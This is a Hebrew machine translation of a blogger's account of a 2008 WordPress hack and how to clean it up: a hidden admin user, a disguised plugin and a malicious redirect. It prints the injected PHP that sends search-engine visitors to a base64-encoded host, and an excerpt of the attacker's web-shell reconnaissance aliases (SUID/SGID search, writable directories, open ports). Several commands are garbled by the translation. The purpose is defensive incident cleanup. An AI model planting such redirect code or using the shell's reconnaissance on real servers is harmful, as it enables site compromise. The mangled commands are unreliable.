בחודש שעבר, אני כבר קיבל אזהרות הבלוג של וירוס ממבקרים מסוימים. בתחילה התעלמתי מהאזהרות, כי הייתי אנטי וירוס די טוב מותקן (קספרסקי AV 2009) ולמרות שהבלוג במשך זמן רב, מעולם לא קיבל התראת וירוס (.. ראיתי משהו חשוד מוקדם יותר כי הרענון הראשון נעלם. לבסוף ...).
לאט לאט החל להופיע וריאציות גדולות מבקר תנועהאחרי אשר לאחרונה נפל בהתמדה והתנועה החלה להיות יותר ויותר אנשים שאומרים לי stealthsettings.com זה virused. אתמול קיבלתי ממישהו מסך עשה כאשר האנטי וירוס חסם תסריט מ stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. זה היה משכנע מספיק בשבילי כי אני צריך לחפש כל המקורות. הרעיון הראשון שעלה במוחי היה לעשות שדרוג הגרסה האחרונה של WordPress (2.5.1), אך לא לפני מחיקת כל הקבצים בסקריפט הישן WordPress ולעשות מסד הנתונים גיבוי. הליך זה לא עבד וכנראה שהיה לוקח לי הרבה זמן להבין איפה הבאג נמצא, אם הוא לא היה אומר לי. אויגן בדיון על כוס קפה, הוא מצא קשר גוגל וזה יהיו טוב לראות אותו.
MyDigitalLife.info, פרסם מאמר שכותרתו: “WordPress פריצה: שחזר ותקן את גוגל ומנוע חיפוש או ללא תעבורת עוגיות המועברת אל Your-Needs.info, AnyResults.Net, Golden-Info.net ואתרים לא חוקיים אחרים"זה קצה החוט שהייתי צריך.
זה על לנצל de WordPress מבוסס על עוגיותשלדעתי הוא מאוד מורכב נעשה לפי הספר. חכם מספיק כדי לעשות SQL Injection מסד הנתונים של הבלוג, כדי ליצור משתמש בלתי נראה בדיקה שגרתית פשוטה לוח ניהול חשבון->משתמש, לבדוק את הספריות וקבצי שרת "לכתיבה" (זֶה chmod 777), לחפש ואל לבצע קבצי הקבוצה עם הרשאות או שורש. אני לא יודע מה הוא שם EXPLOITAT ותראו שיש כמה מאמרים נכתבו עליו, למרות העובדה בלוגים רבים נגועים, כולל רומניה. אוקיי ... אני אנסה לנסות להסביר בהכללות על וירוס זה.
מהו הווירוס?
ראשית, הכנס את דפי מקור בבלוגים, מקשר בלתי נראה למבקרים אך גלוי לאינדקס עבור מנועי החיפוש, במיוחד גוגל. בדרך זו להעביר את דירוג דף לאתרים שצוינו על ידי התוקף. שנית, נוסף מוכנס קוד ניתוב מחדש כתובת אתר למבקרים המגיעים מגוגל, בשידור חי, יאהו, ... או קורא ה-RSS ולא באתר עוגייה. אנטי וירוס מזהה את ההפניה כ Trojan-Clicker.HTML.
תסמינים:
ירידה מסיבית בתנועת מבקר, במיוחד בבלוגים שבו רוב המבקרים מגיעים מגוגל.
זיהוי: (כאן הבעיה מסתבכת למי שלא יודע הרבה על phpmyadmin, php ו linux)
לוס אנג'לס. שימו לב! ראשית להפוך את מסד הנתונים גיבוי!
1. בדקו את קבצי המקור index.php, header.php, footer.php, נושא הבלוג ולראות אם יש קוד שמשתמש בהצפנה base64 או מכיל "if ($ ser ==" 1? && sizeof ($ _ COOKIE) == 0) "בצורה:
<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>... או משהו. מחק את הקוד הזה!
לחץ על תמונה ...
בצילום המסך שלמעלה בחרתי בטעות ו" ". קוד זה חייב להישאר.
2. להשתמש phpMyAdmin וללכת לשולחן באתר wp_usersאיפה לבדוק אם אין שם משתמש שנוצר על 00:00:00 0000-00-00 (מיקום אפשרי user_login לכתוב "WordPress". רשום את מזהה המשתמש הזה (שדה מזהה) ולאחר מכן מחק אותו.
לחץ על תמונה ...
* הקו הירוק יש להסיר ושמר על הזהות שלו. במקרה של מנומנםהיה מזהה = 8 .
3. עבור לטבלה wp_usermeta, איפה ממוקם ו להסיר קווים לזיהוי (שבו השדה USER_ID ערך מזהה מופיע נמחק).
4. בטבלה wp_option, עבור active_plugins ותראה כי התוסף מופעל חשוד. ניתן להשתמש בו כמו סופים _old.giff, _old.pngg, _old.jpeg, _new.php.giffוכו 'שילובים של הרחבות תמונה עשירות עם _old ו- _ new.
SELECT * FROM wp_options WHERE option_name = 'active_plugins'מחק תוסף זה, ואז עבור אל הבלוג -> לוח המחוונים -> תוספים, שם אתה מבטל ומפעיל כל תוסף.
לחץ על התמונה כדי לראות כיצד וירוס בקובץ מופיע active_plugins.
ללכת בדרך על ה-FTP או SSH, שמסומן בactive_plugins ולמחוק את הקובץ מהשרת.
5. הכל בphpMyAdmin, בלוח wp_option, מצא ולמחוק את השורה המכילה "rss_f541b3abd05e7962fcab37737f40fad8"ובין"internal_links_cache ".
בשנת internal_links_cache, הם נמצאים קישורים מוצפנים המופיעים בבלוג הספא וכן קוד של Google Adsמַפרֶקֶת, ההאקר.
6. המומלץ הוא לשנות את הסיסמה שלך בלוג והתחברות להסיר את כל userele החשוד. שדרג לגרסה האחרונה של WordPress והגדר את הבלוג כך שלא יאפשר יותר למשתמשים חדשים להירשם. אין הפסד... יכול גם להגיב לא מיושב.
ניסיתי לעיל להסביר קצת, מה לעשות במצב כזה, לנקות את הבלוג מהווירוס הזה. הבעיה חמורה בהרבה ממה שנדמה והיא לא נפתרה כמעט מכיוון שהם משמשים פגיעויות אבטחה אירוח שרת האינטרנט, שהוא בלוג.
כצעד ראשון של ביטחון, עם גישה SSH, כדי לעשות כמה בדיקות על השרת כדי לראות אם יש קבצים כגון * ו * Pascal: פסקל _old *. * עם סופים.giff,. JPEG,. pngg,. jpgg. קבצים אלה יש למחוק. אם אנחנו לשנות שם של קובץ, למשל. top_right_old.giff in top_right_old.phpאנו רואים שהקובץ הוא בדיוק שרת קוד הניצול.
כמה הוראות שימושיות לבדיקה, ניקוי ואבטחת השרת. (באמצעות SSH)
1. cd / tmp ולבדוק אם יש תיקיות כמו tmpVFlma או שילובים אחרים של שמות כאחד ומחקו אותו. ראה המסך למטה, שתי התיקיות האלה לי:
שם תיקיית rm-rf
2. לבדוק ולבטל (שנה chmod-ul) ככל האפשר התיקיות עם תכונות chmod 777
מצא את כל הקבצים הניתנים לכתיבה ב-dir הנוכחי: מצא. סוג F-סלסול-2-LS
למצוא את כל המדריכים לצריבה בדיר נוכחי: מצא. סוג-D-סלסול-2-LS
מצא את כל הספריות והקבצים הניתנים לכתיבה ב-dir הנוכחי: מצא. פרם--2-LS
3. מחפש קבצים חשודים בשרת.
find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"4, ATTENTION !!! את הקבצים שנקבעו קצת SUID si SGID. קבצים אלה לבצע עם הרשאות שימוש של המשתמש (קבוצה) או השורש, לא אלה של המשתמש הפעיל הקובץ. קבצים אלה יכולים להתפשר השורש, אם בעיות אבטחה. אם אינך משתמש SUID ו sgid קטעי קבצים, לבצע "chmod 0 " באו להסיר את החבילה המכילה אותם.
לנצל מכיל אי שם במקור ...:
if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}... בעיקרון בדרך זו מוצאת פרצות אבטחה. פתיחת יציאות, ספריות "לצריבה" ולבצע קבצים עם הרשאות של הקבוצה / root.
חזור עם יותר ...
כמה בלוגים הנגועים: www.blegoo.com, www.visurat.ro,
fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,
blog.hrmarket.ro, www.nitza.ro,
motorcycles.motomag.ro,
emi.brainient.com, www.picsel.ro,
www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,
www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,
dragos.roua.ro, www.artistul.ro/blog/,
www.mirabilismedia.ro/blog, blog.einvest.ro
... והרשימה עוד הארוכה ... הרבה.
אתה יכול לבדוק אם בלוג נגוע באמצעות מנוע החיפוש של גוגל. העתק הדבק:
לקנות www.blegoo.com אתר
לילה טוב ועבודה טובה;) בקרוב אני חושב שאוגן יגיע עם חדשות, באתר prevezibil.imprevizibil.com
BRB :)
תשומת הלב! שינוי הנושא של WordPress או לשדרג ל WordPress 2.5.1, אינו פתרון להיפטר מהווירוס הזה.
